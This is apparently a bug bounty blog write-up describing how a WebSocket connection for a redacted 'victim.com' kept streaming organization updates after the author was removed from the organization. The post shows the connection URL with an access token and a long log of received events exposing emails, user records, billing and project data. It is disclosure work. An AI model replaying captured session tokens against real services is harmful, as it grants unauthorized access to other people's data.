Hunting Websockets For Fun And Profit


It’s been a while since we came up with a blog post.
So this post will be about how I kept receiving every piece of information that was being updated in my organization, even after I was removed from that organization.
First, let’s start with what WebSockets are.
A good explanation can be found here https://pusher.com/websockets
Let’s start. As the program is private I cannot share it, so I’ll be naming it victim.com and the organization’s subdomain abc.victim.com.
While doing my normal testing I noticed that whenever any info on abc.victim.com is changed, a WebSocket request carrying the details is made; for example, in my case:
https://api.victim.com/ws?account_id=660681&access_token=1055279.rJBikWGAfRCTgrK8xhXeoF7hR5j-kB4SriC3jZOqZH_JapsE2vZ206qKVsS5qPqNntpsBh-nBCDmzQuuepCxKw

The response for the above WebSocket connection was:

{"action":"update","acting_user_id":null,"object":{"user_connection":{"id":63184,"person_id":175308,"last_active_at":"2016-08-22T06:06:02.651Z"}}}

After looking at the response, I wondered what would happen if the user were removed from the organization: would they still be able to fetch data from the organization?
Now the question was: what can and cannot be extracted from the WebSocket?
The first thing I noticed was that, after being kicked from the organization, the user is still able to receive every detail of the changes happening in the organization by reconnecting with the WebSocket request captured earlier — in other words, the access_token in that URL was evidently still accepted after the removal instead of being revoked.
Example of the responses received after the user was removed from the organization:
RECEIVED TEXT: {"action":"update","acting_user_id":null,"object":{"user_connection":{"id":74022,"person_id":205693,"last_active_at":"2016-10-27T17:18:07.603Z"}}}

RECEIVED TEXT: {"logged_in_user_ids":["202510","205693"]}

RECEIVED TEXT: {"action":"destroy","acting_user_id":202510,"object":{"person":{"id":205693,"first_name":"owner","last_name":"owner","email":"myemailhere@gmail.com","login":"enabled","admin":true,"archived":false,"subscribed":true,"avatar_url":"https://secure.gravatar.com/avatar/95a2d6ba3ebdf6f5b5bb56c2306927a8.jpg?s=200u0026d=https://victim.s3.amazonaws.com/default-avatars/OO.png","teams":[],"updated_at":"2016-10-27T17:17:20.656Z","updated_by_id":null,"site_user_id":null,"max_allocation_per_day":null,"assignment_ids":[]}}}

RECEIVED TEXT: {"action":"destroy","acting_user_id":202510,"object":{"user_connection":{"id":74022,"person_id":205693,"last_active_at":"2016-10-27T17:18:07.000Z"}}}

RECEIVED TEXT: {"action":"update","acting_user_id":202510,"object":{"subscription":{"next_billing_date":"2016-11-16","amount":500,"amount_per_person":500,"receipt_recipient":null,"status":"trial","purchased_people":1,"interval":"monthly","card":null,"address":null,"discount":null}}}

RECEIVED TEXT: {"action":"create","acting_user_id":202510,"object":{"person":{"id":205694,"first_name":"add","last_name":"hacker","email":null,"login":"disabled","admin":true,"archived":false,"subscribed":false,"avatar_url":"https://victim-files.s3.amazonaws.com/default-avatars/AH.png","teams":[],"updated_at":"2016-10-27T17:18:35.489Z","updated_by_id":202510,"site_user_id":null,"max_allocation_per_day":null,"assignment_ids":[]}}}

RECEIVED TEXT: {"action":"update","acting_user_id":202510,"object":{"subscription":{"next_billing_date":"2016-11-16","amount":1000,"amount_per_person":500,"receipt_recipient":null,"status":"trial","purchased_people":2,"interval":"monthly","card":null,"address":null,"discount":null}}}

RECEIVED TEXT: {"action":"update","acting_user_id":202510,"object":{"person":{"id":205694,"first_name":"add","last_name":"hacker1","email":null,"login":"disabled","admin":true,"archived":false,"subscribed":false,"avatar_url":"https://victim-files.s3.amazonaws.com/default-avatars/AH.png","teams":[],"updated_at":"2016-10-27T17:18:59.499Z","updated_by_id":202510,"site_user_id":null,"max_allocation_per_day":null,"assignment_ids":[]}}}

RECEIVED TEXT: {"action":"create","acting_user_id":202510,"object":{"project":{"id":799337,"name":"dada","color":"orange","code":null,"notes":null,"start_date":null,"end_date":null,"site_id":null,"archived":false,"updated_at":"2016-10-27T17:20:11.285Z","updated_by_id":202510,"client_id":398744,"tags":[],"assignment_ids":[],"milestone_ids":[]}}}

RECEIVED TEXT: {"action":"update","acting_user_id":202510,"object":{"project":{"id":799337,"name":"dada","color":"orange","code":null,"notes":null,"start_date":null,"end_date":null,"site_id":null,"archived":false,"updated_at":"2016-10-27T17:20:22.290Z","updated_by_id":202510,"client_id":398744,"tags":[],"assignment_ids":[],"milestone_ids":[]}}}

RECEIVED TEXT: {"action":"update","acting_user_id":202510,"object":{"project":{"id":799337,"name":"dada","color":"orange","code":null,"notes":null,"start_date":null,"end_date":null,"site_id":null,"archived":false,"updated_at":"2016-10-27T17:20:22.290Z","updated_by_id":202510,"client_id":398744,"tags":[],"assignment_ids":[],"milestone_ids":[]}}}

RECEIVED TEXT: {"action":"destroy","acting_user_id":202510,"object":{"person":{"id":205694,"first_name":"add","last_name":"hacker1","email":null,"login":"disabled","admin":true,"archived":false,"subscribed":false,"avatar_url":"https://victim-files.s3.amazonaws.com/default-avatars/AH.png","teams":[],"updated_at":"2016-10-27T17:18:59.499Z","updated_by_id":202510,"site_user_id":null,"max_allocation_per_day":null,"assignment_ids":[]}}}

RECEIVED TEXT: {"action":"update","acting_user_id":202510,"object":{"subscription":{"next_billing_date":"2016-11-16","amount":500,"amount_per_person":500,"receipt_recipient":null,"status":"trial","purchased_people":1,"interval":"monthly","card":null,"address":null,"discount":null}}}

RECEIVED TEXT: {"action":"create","acting_user_id":202510,"object":{"person":{"id":205695,"first_name":"aman","last_name":"dhaker","email":"testmymailforxss@gmail.com","login":"disabled","admin":false,"archived":false,"subscribed":false,"avatar_url":"https://secure.gravatar.com/avatar/95a2d6ba3ebdf6f5b5bb56c2306927a8.jpg?s=200u0026d=https://victim-files.s3.amazonaws.com/default-avatars/AD.png","teams":[],"updated_at":"2016-10-27T17:20:54.998Z","updated_by_id":202510,"site_user_id":null,"max_allocation_per_day":null,"assignment_ids":[]}}}

RECEIVED TEXT: {"logged_in_user_ids":["202510","205693"]}

RECEIVED TEXT: {"action":"update","acting_user_id":null,"object":{"person":{"id":205695,"first_name":"owner","last_name":"owner","email":"testmymailforxss@gmail.com","login":"enabled","admin":false,"archived":false,"subscribed":false,"avatar_url":"https://secure.gravatar.com/avatar/95a2d6ba3ebdf6f5b5bb56c2306927a8.jpg?s=200u0026d=https://victim-files.s3.amazonaws.com/default-avatars/OO.png","teams":[],"updated_at":"2016-10-27T17:21:26.586Z","updated_by_id":null,"site_user_id":null,"max_allocation_per_day":null,"assignment_ids":[]}}}

RECEIVED TEXT: {"logged_in_user_ids":["202510","205693","205695"]}

RECEIVED TEXT: {"action":"create","acting_user_id":null,"object":{"user_connection":{"id":74023,"person_id":205695,"last_active_at":"2016-10-27T17:21:36.192Z"}}}

RECEIVED TEXT: {"logged_in_user_ids":["202510","205693","205695"]}

RECEIVED TEXT: {"action":"update","acting_user_id":null,"object":{"user_connection":{"id":74023,"person_id":205695,"last_active_at":"2016-10-27T17:21:57.285Z"}}}

RECEIVED TEXT: {"action":"create","acting_user_id":202510,"object":{"person":{"id":205696,"first_name":"aman","last_name":"dhaker","email":"","login":"disabled","admin":true,"archived":false,"subscribed":false,"avatar_url":"https://victim-files.s3.amazonaws.com/default-avatars/AD.png","teams":[],"updated_at":"2016-10-27T17:22:06.751Z","updated_by_id":202510,"site_user_id":null,"max_allocation_per_day":null,"assignment_ids":[]}}}

RECEIVED TEXT: {"action":"update","acting_user_id":202510,"object":{"subscription":{"next_billing_date":"2016-11-16","amount":1500,"amount_per_person":500,"receipt_recipient":null,"status":"trial","purchased_people":3,"interval":"monthly","card":null,"address":null,"discount":null}}}

I was able to extract details such as user emails, project details, customer details and contacts.
Another thing I noticed was that I was able to extract those details even when I only had view-only permission.
Thanks For Reading.
Cheers
Bugdiscloseguys

2 thoughts on “Hunting Websockets For Fun And Profit”

  1. Can you please explain one thing: when you delete the user id param, what info exactly did you get — I mean that whole bunch of data?

    Thank you,
